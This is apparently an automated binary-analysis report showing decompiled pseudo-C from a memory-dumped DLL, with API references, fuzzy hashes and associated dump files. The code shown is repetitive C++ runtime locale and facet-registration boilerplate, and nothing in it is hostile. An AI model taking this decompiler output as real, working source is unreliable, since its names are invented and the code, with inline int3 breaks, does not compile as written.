																																	__eflags = E6DDE10BF(_t699, _t765, _t920, _t931, _t954) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6DDB1438(_t990 - 0x20);
																																		E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de383cf, _t699, _t931, _t954, 0x14);
																																		E6DDD6653(_t990 - 0x14, 0);
																																		_t955 =  *0x6de96df8; // 0x0
																																		 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																		 *(_t990 - 0x10) = _t955;
																																		_t451 = E6DDB161C(0x6de96da4);
																																		_t772 =  *((intOrPtr*)(_t990 + 8));
																																		_t932 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t451);
																																		__eflags = _t932;
																																		if(_t932 != 0) {
																																			L75:
																																			E6DDD66BA(_t990 - 0x14);
																																			return E6DDF0075(_t932);
																																		} else {
																																			__eflags = _t955;
																																			if(_t955 == 0) {
																																				_push( *((intOrPtr*)(_t990 + 8)));
																																				_push(_t990 - 0x10);
																																				__eflags = E6DDE1127(_t699, _t772, _t920, _t932, _t955) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6DDB1438(_t990 - 0x20);
																																					E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																					asm("int3");
																																					E6DDF00AC(0x6de383cf, _t699, _t932, _t955, 0x14);
																																					E6DDD6653(_t990 - 0x14, 0);
																																					_t956 =  *0x6de96df4; // 0x0
																																					 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																					 *(_t990 - 0x10) = _t956;
																																					_t464 = E6DDB161C(0x6de96da0);
																																					_t779 =  *((intOrPtr*)(_t990 + 8));
																																					_t933 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t464);
																																					__eflags = _t933;
																																					if(_t933 != 0) {
																																						L82:
																																						E6DDD66BA(_t990 - 0x14);
																																						return E6DDF0075(_t933);
																																					} else {
																																						__eflags = _t956;
																																						if(_t956 == 0) {
																																							_push( *((intOrPtr*)(_t990 + 8)));
																																							_push(_t990 - 0x10);
																																							__eflags = E6DDE11AB(_t699, _t779, _t920, _t933, _t956) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6DDB1438(_t990 - 0x20);
																																								E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																								asm("int3");
																																								E6DDF00AC(0x6de383cf, _t699, _t933, _t956, 0x14);
																																								E6DDD6653(_t990 - 0x14, 0);
																																								_t957 =  *0x6de96dc8; // 0x0
																																								 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																								 *(_t990 - 0x10) = _t957;
																																								_t477 = E6DDB161C(0x6de96d7c);
																																								_t786 =  *((intOrPtr*)(_t990 + 8));
																																								_t934 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t477);
																																								__eflags = _t934;
																																								if(_t934 != 0) {
																																									L89:
																																									E6DDD66BA(_t990 - 0x14);
																																									return E6DDF0075(_t934);
																																								} else {
																																									__eflags = _t957;
																																									if(_t957 == 0) {
																																										_push( *((intOrPtr*)(_t990 + 8)));
																																										_push(_t990 - 0x10);
																																										__eflags = E6DDE1230(_t699, _t786, _t920, _t934, _t957) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6DDB1438(_t990 - 0x20);
																																											E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																											asm("int3");
																																											E6DDF00AC(0x6de383cf, _t699, _t934, _t957, 0x14);
																																											E6DDD6653(_t990 - 0x14, 0);
																																											_t958 =  *0x6de96dc4; // 0x0
																																											 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																											 *(_t990 - 0x10) = _t958;
																																											_t490 = E6DDB161C(0x6de96d78);
																																											_t793 =  *((intOrPtr*)(_t990 + 8));
																																											_t935 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t490);
																																											__eflags = _t935;
																																											if(_t935 != 0) {
																																												L96:
																																												E6DDD66BA(_t990 - 0x14);
																																												return E6DDF0075(_t935);
																																											} else {
																																												__eflags = _t958;
																																												if(_t958 == 0) {
																																													_push( *((intOrPtr*)(_t990 + 8)));
																																													_push(_t990 - 0x10);
																																													__eflags = E6DDE12B4(_t699, _t793, _t920, _t935, _t958) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6DDB1438(_t990 - 0x20);
																																														E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																														asm("int3");
																																														E6DDF00AC(0x6de383cf, _t699, _t935, _t958, 0x14);
																																														E6DDD6653(_t990 - 0x14, 0);
																																														_t959 =  *0x6de96dd8; // 0x0
																																														 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																														 *(_t990 - 0x10) = _t959;
																																														_t503 = E6DDB161C(0x6de96d84);
																																														_t800 =  *((intOrPtr*)(_t990 + 8));
																																														_t936 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t503);
																																														__eflags = _t936;
																																														if(_t936 != 0) {
																																															L103:
																																															E6DDD66BA(_t990 - 0x14);
																																															return E6DDF0075(_t936);
																																														} else {
																																															__eflags = _t959;
																																															if(_t959 == 0) {
																																																_push( *((intOrPtr*)(_t990 + 8)));
																																																_push(_t990 - 0x10);
																																																__eflags = E6DDE1339(_t699, _t800, _t920, _t936, _t959) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6DDB1438(_t990 - 0x20);
																																																	E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																																	asm("int3");
																																																	E6DDF00AC(0x6de383cf, _t699, _t936, _t959, 0x14);
																																																	E6DDD6653(_t990 - 0x14, 0);
																																																	_t960 =  *0x6de96db0; // 0x0
																																																	 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																	 *(_t990 - 0x10) = _t960;
																																																	_t516 = E6DDB161C(0x6de96d64);
																																																	_t807 =  *((intOrPtr*)(_t990 + 8));
																																																	_t937 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t516);
																																																	__eflags = _t937;
																																																	if(_t937 != 0) {
																																																		L110:
																																																		E6DDD66BA(_t990 - 0x14);
																																																		return E6DDF0075(_t937);
																																																	} else {
																																																		__eflags = _t960;
																																																		if(_t960 == 0) {
																																																			_push( *((intOrPtr*)(_t990 + 8)));
																																																			_push(_t990 - 0x10);
																																																			__eflags = E6DDE13A1(_t699, _t807, _t920, _t937, _t960) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6DDB1438(_t990 - 0x20);
																																																				E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																																				asm("int3");
																																																				E6DDF00AC(0x6de383cf, _t699, _t937, _t960, 0x14);
																																																				E6DDD6653(_t990 - 0x14, 0);
																																																				_t961 =  *0x6de96ddc; // 0x0
																																																				 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																				 *(_t990 - 0x10) = _t961;
																																																				_t529 = E6DDB161C(0x6de96d88);
																																																				_t814 =  *((intOrPtr*)(_t990 + 8));
																																																				_t938 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t529);
																																																				__eflags = _t938;
																																																				if(_t938 != 0) {
																																																					L117:
																																																					E6DDD66BA(_t990 - 0x14);
																																																					return E6DDF0075(_t938);
																																																				} else {
																																																					__eflags = _t961;
																																																					if(_t961 == 0) {
																																																						_push( *((intOrPtr*)(_t990 + 8)));
																																																						_push(_t990 - 0x10);
																																																						__eflags = E6DDE1409(_t699, _t814, _t920, _t938, _t961) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6DDB1438(_t990 - 0x20);
																																																							E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																																							asm("int3");
																																																							E6DDF00AC(0x6de383cf, _t699, _t938, _t961, 0x14);
																																																							E6DDD6653(_t990 - 0x14, 0);
																																																							_t962 =  *0x6de96de0; // 0x0
																																																							 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																							 *(_t990 - 0x10) = _t962;
																																																							_t542 = E6DDB161C(0x6de96d8c);
																																																							_t821 =  *((intOrPtr*)(_t990 + 8));
																																																							_t939 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t542);
																																																							__eflags = _t939;
																																																							if(_t939 != 0) {
																																																								L124:
																																																								E6DDD66BA(_t990 - 0x14);
																																																								return E6DDF0075(_t939);
																																																							} else {
																																																								__eflags = _t962;
																																																								if(_t962 == 0) {
																																																									_push( *((intOrPtr*)(_t990 + 8)));
																																																									_push(_t990 - 0x10);
																																																									__eflags = E6DDE1471(_t699, _t821, _t920, _t939, _t962) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6DDB1438(_t990 - 0x20);
																																																										E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																																										asm("int3");
																																																										E6DDF00AC(0x6de383cf, _t699, _t939, _t962, 0x14);
																																																										E6DDD6653(_t990 - 0x14, 0);
																																																										_t963 =  *0x6de96dfc; // 0x0
																																																										 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																										 *(_t990 - 0x10) = _t963;
																																																										_t555 = E6DDB161C(0x6de96da8);
																																																										_t828 =  *((intOrPtr*)(_t990 + 8));
																																																										_t940 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t555);
																																																										__eflags = _t940;
																																																										if(_t940 != 0) {
																																																											L131:
																																																											E6DDD66BA(_t990 - 0x14);
																																																											return E6DDF0075(_t940);
																																																										} else {
																																																											__eflags = _t963;
																																																											if(_t963 == 0) {
																																																												_push( *((intOrPtr*)(_t990 + 8)));
																																																												_push(_t990 - 0x10);
																																																												__eflags = E6DDE14EC(_t699, _t828, _t920, _t940, _t963) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													E6DDB1438(_t990 - 0x20);
																																																													E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																																													asm("int3");
																																																													E6DDF00AC(0x6de383cf, _t699, _t940, _t963, 0x14);
																																																													E6DDD6653(_t990 - 0x14, 0);
																																																													_t964 =  *0x6de96dcc; // 0x0
																																																													 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																													 *(_t990 - 0x10) = _t964;
																																																													_t568 = E6DDB161C(0x6de96d80);
																																																													_t835 =  *((intOrPtr*)(_t990 + 8));
																																																													_t941 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t568);
																																																													__eflags = _t941;
																																																													if(_t941 != 0) {
																																																														L138:
																																																														E6DDD66BA(_t990 - 0x14);
																																																														return E6DDF0075(_t941);
																																																													} else {
																																																														__eflags = _t964;
																																																														if(_t964 == 0) {
																																																															_push( *((intOrPtr*)(_t990 + 8)));
																																																															_push(_t990 - 0x10);
																																																															__eflags = E6DDE1558(_t699, _t835, _t920, _t941, _t964) - 0xffffffff;
																																																															if(__eflags == 0) {
																																																																E6DDB1438(_t990 - 0x20);
																																																																E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																																																asm("int3");
																																																																E6DDF00AC(0x6de383cf, _t699, _t941, _t964, 0x14);
																																																																E6DDD6653(_t990 - 0x14, 0);
																																																																_t965 =  *0x6de96e00; // 0x0
																																																																 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																																 *(_t990 - 0x10) = _t965;
																																																																_t581 = E6DDB161C(0x6de96dac);
																																																																_t842 =  *((intOrPtr*)(_t990 + 8));
																																																																_t942 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t581);
																																																																__eflags = _t942;
																																																																if(_t942 != 0) {
																																																																	L145:
																																																																	E6DDD66BA(_t990 - 0x14);
																																																																	return E6DDF0075(_t942);
																																																																} else {
																																																																	__eflags = _t965;
																																																																	if(_t965 == 0) {
																																																																		_push( *((intOrPtr*)(_t990 + 8)));
																																																																		_push(_t990 - 0x10);
																																																																		__eflags = E6DDE15C4(_t699, _t842, _t920, _t942, _t965) - 0xffffffff;
																																																																		if(__eflags == 0) {
																																																																			E6DDB1438(_t990 - 0x20);
																																																																			E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																																																			asm("int3");
																																																																			E6DDF00AC(0x6de383cf, _t699, _t942, _t965, 0x14);
																																																																			E6DDD6653(_t990 - 0x14, 0);
																																																																			_t966 =  *0x6de96dd0; // 0x0
																																																																			 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																																			 *(_t990 - 0x10) = _t966;
																																																																			_t594 = E6DDB161C(0x6de96d60);
																																																																			_t849 =  *((intOrPtr*)(_t990 + 8));
																																																																			_t943 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t594);
																																																																			__eflags = _t943;
																																																																			if(_t943 != 0) {
																																																																				L152:
																																																																				E6DDD66BA(_t990 - 0x14);
																																																																				return E6DDF0075(_t943);
																																																																			} else {
																																																																				__eflags = _t966;
																																																																				if(_t966 == 0) {
																																																																					_push( *((intOrPtr*)(_t990 + 8)));
																																																																					_push(_t990 - 0x10);
																																																																					__eflags = E6DDE162A(_t699, _t849, _t920, _t943, _t966) - 0xffffffff;
																																																																					if(__eflags == 0) {
																																																																						_t853 = _t990 - 0x20;
																																																																						E6DDB1438(_t853);
																																																																						E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																																																						asm("int3");
																																																																						E6DDF00AC(0x6de3851f, _t699, _t943, _t966, 4);
																																																																						_t967 = _t853;
																																																																						 *(_t990 - 0x10) = _t967;
																																																																						 *((intOrPtr*)(_t967 + 4)) =  *((intOrPtr*)(_t990 + 0xc));
																																																																						_push( *((intOrPtr*)(_t990 + 0x14)));
																																																																						_t315 = _t990 - 4;
																																																																						 *_t315 =  *(_t990 - 4) & 0x00000000;
																																																																						__eflags =  *_t315;
																																																																						 *_t967 = 0x6de3c0c4;
																																																																						 *((char*)(_t967 + 0x28)) =  *((intOrPtr*)(_t990 + 0x10));
																																																																						E6DDE542F(_t699, _t853, _t920, _t943, _t967,  *_t315);
																																																																						return E6DDF0075(_t967,  *((intOrPtr*)(_t990 + 8)));
																																																																					} else {
																																																																						_t943 =  *(_t990 - 0x10);
																																																																						 *(_t990 - 0x10) = _t943;
																																																																						 *(_t990 - 4) = 1;
																																																																						E6DDD6FD3(__eflags, _t943);
																																																																						 *0x6de3a26c();
																																																																						 *((intOrPtr*)( *((intOrPtr*)( *_t943 + 4))))();
																																																																						 *0x6de96dd0 = _t943;
																																																																						goto L152;
																																																																					}
																																																																				} else {
																																																																					_t943 = _t966;
																																																																					goto L152;
																																																																				}
																																																																			}
																																																																		} else {
																																																																			_t942 =  *(_t990 - 0x10);
																																																																			 *(_t990 - 0x10) = _t942;
																																																																			 *(_t990 - 4) = 1;
																																																																			E6DDD6FD3(__eflags, _t942);
																																																																			 *0x6de3a26c();
																																																																			 *((intOrPtr*)( *((intOrPtr*)( *_t942 + 4))))();
																																																																			 *0x6de96e00 = _t942;
																																																																			goto L145;
																																																																		}
																																																																	} else {
																																																																		_t942 = _t965;
																																																																		goto L145;
																																																																	}
																																																																}
																																																															} else {
																																																																_t941 =  *(_t990 - 0x10);
																																																																 *(_t990 - 0x10) = _t941;
																																																																 *(_t990 - 4) = 1;
																																																																E6DDD6FD3(__eflags, _t941);
																																																																 *0x6de3a26c();
																																																																 *((intOrPtr*)( *((intOrPtr*)( *_t941 + 4))))();
																																																																 *0x6de96dcc = _t941;
																																																																goto L138;
																																																															}
																																																														} else {
																																																															_t941 = _t964;
																																																															goto L138;
																																																														}
																																																													}
																																																												} else {
																																																													_t940 =  *(_t990 - 0x10);
																																																													 *(_t990 - 0x10) = _t940;
																																																													 *(_t990 - 4) = 1;
																																																													E6DDD6FD3(__eflags, _t940);
																																																													 *0x6de3a26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t940 + 4))))();
																																																													 *0x6de96dfc = _t940;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t940 = _t963;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t939 =  *(_t990 - 0x10);
																																																										 *(_t990 - 0x10) = _t939;
																																																										 *(_t990 - 4) = 1;
																																																										E6DDD6FD3(__eflags, _t939);
																																																										 *0x6de3a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t939 + 4))))();
																																																										 *0x6de96de0 = _t939;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t939 = _t962;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t938 =  *(_t990 - 0x10);
																																																							 *(_t990 - 0x10) = _t938;
																																																							 *(_t990 - 4) = 1;
																																																							E6DDD6FD3(__eflags, _t938);
																																																							 *0x6de3a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t938 + 4))))();
																																																							 *0x6de96ddc = _t938;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t938 = _t961;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t937 =  *(_t990 - 0x10);
																																																				 *(_t990 - 0x10) = _t937;
																																																				 *(_t990 - 4) = 1;
																																																				E6DDD6FD3(__eflags, _t937);
																																																				 *0x6de3a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t937 + 4))))();
																																																				 *0x6de96db0 = _t937;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t937 = _t960;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t936 =  *(_t990 - 0x10);
																																																	 *(_t990 - 0x10) = _t936;
																																																	 *(_t990 - 4) = 1;
																																																	E6DDD6FD3(__eflags, _t936);
																																																	 *0x6de3a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t936 + 4))))();
																																																	 *0x6de96dd8 = _t936;
																																																	goto L103;
																																																}
																																															} else {
																																																_t936 = _t959;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t935 =  *(_t990 - 0x10);
																																														 *(_t990 - 0x10) = _t935;
																																														 *(_t990 - 4) = 1;
																																														E6DDD6FD3(__eflags, _t935);
																																														 *0x6de3a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t935 + 4))))();
																																														 *0x6de96dc4 = _t935;
																																														goto L96;
																																													}
																																												} else {
																																													_t935 = _t958;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t934 =  *(_t990 - 0x10);
																																											 *(_t990 - 0x10) = _t934;
																																											 *(_t990 - 4) = 1;
																																											E6DDD6FD3(__eflags, _t934);
																																											 *0x6de3a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t934 + 4))))();
																																											 *0x6de96dc8 = _t934;
																																											goto L89;
																																										}
																																									} else {
																																										_t934 = _t957;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t933 =  *(_t990 - 0x10);
																																								 *(_t990 - 0x10) = _t933;
																																								 *(_t990 - 4) = 1;
																																								E6DDD6FD3(__eflags, _t933);
																																								 *0x6de3a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t933 + 4))))();
																																								 *0x6de96df4 = _t933;
																																								goto L82;
																																							}
																																						} else {
																																							_t933 = _t956;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t932 =  *(_t990 - 0x10);
																																					 *(_t990 - 0x10) = _t932;
																																					 *(_t990 - 4) = 1;
																																					E6DDD6FD3(__eflags, _t932);
																																					 *0x6de3a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t932 + 4))))();
																																					 *0x6de96df8 = _t932;
																																					goto L75;
																																				}
																																			} else {
																																				_t932 = _t955;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t931 =  *(_t990 - 0x10);
																																		 *(_t990 - 0x10) = _t931;
																																		 *(_t990 - 4) = 1;
																																		E6DDD6FD3(__eflags, _t931);
																																		 *0x6de3a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t931 + 4))))();
																																		 *0x6de96dc0 = _t931;
																																		goto L68;
																																	}
																																} else {
																																	_t931 = _t954;
																																	goto L68;
																																}
																															}
																														} else {
																															_t930 =  *(_t990 - 0x10);
																															 *(_t990 - 0x10) = _t930;
																															 *(_t990 - 4) = 1;
																															E6DDD6FD3(__eflags, _t930);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t930 + 4))))();
																															 *0x6de96df0 = _t930;
																															goto L61;
																														}
																													} else {
																														_t930 = _t953;
																														goto L61;
																													}
																												}
																											} else {
																												_t929 =  *(_t990 - 0x10);
																												 *(_t990 - 0x10) = _t929;
																												 *(_t990 - 4) = 1;
																												E6DDD6FD3(__eflags, _t929);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t929 + 4))))();
																												 *0x6de96dbc = _t929;
																												goto L54;
																											}
																										} else {
																											_t929 = _t952;
																											goto L54;
																										}
																									}
																								} else {
																									_t928 =  *(_t990 - 0x10);
																									 *(_t990 - 0x10) = _t928;
																									 *(_t990 - 4) = 1;
																									E6DDD6FD3(__eflags, _t928);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t928 + 4))))();
																									 *0x6de96dec = _t928;
																									goto L47;
																								}
																							} else {
																								_t928 = _t951;
																								goto L47;
																							}
																						}
																					} else {
																						_t927 =  *(_t990 - 0x10);
																						 *(_t990 - 0x10) = _t927;
																						 *(_t990 - 4) = 1;
																						E6DDD6FD3(__eflags, _t927);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t927 + 4))))();
																						 *0x6de96db8 = _t927;
																						goto L40;
																					}
																				} else {
																					_t927 = _t950;
																					goto L40;
																				}
																			}
																		} else {
																			_t926 =  *(_t990 - 0x10);
																			 *(_t990 - 0x10) = _t926;
																			 *(_t990 - 4) = 1;
																			E6DDD6FD3(__eflags, _t926);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t926 + 4))))();
																			 *0x6de96de8 = _t926;
																			goto L33;
																		}
																	} else {
																		_t926 = _t949;
																		goto L33;
																	}
																}
															} else {
																_t925 =  *(_t990 - 0x10);
																 *(_t990 - 0x10) = _t925;
																 *(_t990 - 4) = 1;
																E6DDD6FD3(__eflags, _t925);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t925 + 4))))();
																 *0x6de96dd4 = _t925;
																goto L26;
															}
														} else {
															_t925 = _t948;
															goto L26;
														}
													}
												} else {
													_t924 =  *(_t990 - 0x10);
													 *(_t990 - 0x10) = _t924;
													 *(_t990 - 4) = 1;
													E6DDD6FD3(__eflags, _t924);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t924 + 4))))();
													 *0x6de96db4 = _t924;
													goto L19;
												}
											} else {
												_t924 = _t947;
												goto L19;
											}
										}
									} else {
										_t923 =  *(_t990 - 0x10);
										 *(_t990 - 0x10) = _t923;
										 *(_t990 - 4) = 1;
										E6DDD6FD3(__eflags, _t923);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t923 + 4))))();
										 *0x6de96de4 = _t923;
										goto L12;
									}
								} else {
									_t923 = _t946;
									goto L12;
								}
							}
						} else {
							_t922 =  *(_t990 - 0x10);
							 *(_t990 - 0x10) = _t922;
							 *(_t990 - 4) = 1;
							E6DDD6FD3(__eflags, _t922);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t922 + 4))))();
							 *0x6de96e04 = _t922;
							goto L5;
						}
					} else {
						_t922 = _t945;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDEEF2
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDEEFC
int.LIBCPMT ref: 6DDDEF13

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

codecvt.LIBCPMT ref: 6DDDEF36
std::_Facet_Register.LIBCPMT ref: 6DDDEF4D
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDEF6D
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDEF8B

Strings

0km, xrefs: 6DDDEF07

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID: 0km
API String ID: 2594415655-2032977153
Opcode ID: d1ef1f999e76c4a91be9f605249a0f450980ed09b56855efd16f89bf782407ec
Instruction ID: 00de44ad832d3e67fdb019f8f757dcdc7e7822f1b05845c6a3432a11bf288bc6
Opcode Fuzzy Hash: d1ef1f999e76c4a91be9f605249a0f450980ed09b56855efd16f89bf782407ec
Instruction Fuzzy Hash: 1211A0B6909519DBCF01FB64C850ABDB7B5AF54318F264009F511AB290DF749E058BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF759, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDDF759(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t139;
				signed int _t140;
				void* _t152;
				void* _t165;
				void* _t178;
				void* _t191;
				void* _t204;
				void* _t217;
				void* _t230;
				void* _t243;
				signed int _t359;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				void* _t418;

				_t387 = __edx;
				_t296 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t418 - 0x14, 0);
				_t399 =  *0x6de96dc4; // 0x0
				 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
				 *(_t418 - 0x10) = _t399;
				_t139 = E6DDB161C(0x6de96d78);
				_t299 =  *((intOrPtr*)(_t418 + 8));
				_t140 = E6DDB171B( *((intOrPtr*)(_t418 + 8)), _t139);
				_t389 = _t140;
				if(_t140 != 0) {
					L5:
					E6DDD66BA(_t418 - 0x14);
					return E6DDF0075(_t389);
				} else {
					if(_t399 == 0) {
						_push( *((intOrPtr*)(_t418 + 8)));
						_push(_t418 - 0x10);
						__eflags = E6DDE12B4(__ebx, _t299, __edx, _t389, _t399) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t418 - 0x20);
							E6DDF3D74(_t418 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t389, _t399, 0x14);
							E6DDD6653(_t418 - 0x14, 0);
							_t400 =  *0x6de96dd8; // 0x0
							 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
							 *(_t418 - 0x10) = _t400;
							_t152 = E6DDB161C(0x6de96d84);
							_t306 =  *((intOrPtr*)(_t418 + 8));
							_t390 = E6DDB171B( *((intOrPtr*)(_t418 + 8)), _t152);
							__eflags = _t390;
							if(_t390 != 0) {
								L12:
								E6DDD66BA(_t418 - 0x14);
								return E6DDF0075(_t390);
							} else {
								__eflags = _t400;
								if(_t400 == 0) {
									_push( *((intOrPtr*)(_t418 + 8)));
									_push(_t418 - 0x10);
									__eflags = E6DDE1339(_t296, _t306, __edx, _t390, _t400) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t418 - 0x20);
										E6DDF3D74(_t418 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t296, _t390, _t400, 0x14);
										E6DDD6653(_t418 - 0x14, 0);
										_t401 =  *0x6de96db0; // 0x0
										 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
										 *(_t418 - 0x10) = _t401;
										_t165 = E6DDB161C(0x6de96d64);
										_t313 =  *((intOrPtr*)(_t418 + 8));
										_t391 = E6DDB171B( *((intOrPtr*)(_t418 + 8)), _t165);
										__eflags = _t391;
										if(_t391 != 0) {
											L19:
											E6DDD66BA(_t418 - 0x14);
											return E6DDF0075(_t391);
										} else {
											__eflags = _t401;
											if(_t401 == 0) {
												_push( *((intOrPtr*)(_t418 + 8)));
												_push(_t418 - 0x10);
												__eflags = E6DDE13A1(_t296, _t313, __edx, _t391, _t401) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t418 - 0x20);
													E6DDF3D74(_t418 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t296, _t391, _t401, 0x14);
													E6DDD6653(_t418 - 0x14, 0);
													_t402 =  *0x6de96ddc; // 0x0
													 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
													 *(_t418 - 0x10) = _t402;
													_t178 = E6DDB161C(0x6de96d88);
													_t320 =  *((intOrPtr*)(_t418 + 8));
													_t392 = E6DDB171B( *((intOrPtr*)(_t418 + 8)), _t178);
													__eflags = _t392;
													if(_t392 != 0) {
														L26:
														E6DDD66BA(_t418 - 0x14);
														return E6DDF0075(_t392);
													} else {
														__eflags = _t402;
														if(_t402 == 0) {
															_push( *((intOrPtr*)(_t418 + 8)));
															_push(_t418 - 0x10);
															__eflags = E6DDE1409(_t296, _t320, _t387, _t392, _t402) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t418 - 0x20);
																E6DDF3D74(_t418 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t296, _t392, _t402, 0x14);
																E6DDD6653(_t418 - 0x14, 0);
																_t403 =  *0x6de96de0; // 0x0
